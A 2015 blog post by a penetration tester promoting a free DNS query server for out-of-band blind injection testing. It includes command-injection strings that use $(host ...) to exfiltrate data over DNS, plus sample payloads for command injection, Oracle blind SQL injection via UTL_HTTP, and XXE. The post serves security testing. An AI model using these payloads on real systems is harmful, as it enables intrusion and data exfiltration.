Monday, December 7, 2015

Out of Band Injection Testing: Free public NS Query server

In case of blind injection testing, and in addition to previous post, i'm launching a pilot version of my DNS Server (Free for now).

Open up your terminal and connect to on port 5353:

~# nc 5353

Your match string [a-z0-9]{5,} only [e.g. nicolas]: nicolas

Example query:
{"date": "06-Dec-2015", "query": "", "client": "", "time": "17:27:44.409"}

In my last WebApplication Penetration Test, i was able to read source code of PHP application, and there was a place with exec() function.
The problem that I didn't get any output, and regular techniques of "sleep 60" does not seems to be working.

With my NS server I've successfully exfiltrated data over DNS queries.

PHP source:
exec('/opt/someprogram "$filename" "$tmppath"')

Successful injection:
/opt/someprogram blahblah.jpg /tmp/images$(host

Get WGET Version with this technique:
/opt/someprogram blahblah.jpg /tmp/image$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.')

With this output:
{"date": "xx-xxx-2015", "query": "", "client": "xx.xx.xx.xx#63325:", "time": ""}

It may be useful with Command Injection, for example:
$(host $
| ping $ |
&& nslookup &&

Blind SQL Injection like this:
SELECT * FROM products WHERE id=1||UTL_HTTP.request('') --

External ENTITY Injection:
<!ENTITY dtd SYSTEM "">%dtd

and more.

For now, it's FREE but with limited support. (you may some $$$ if you love using it :)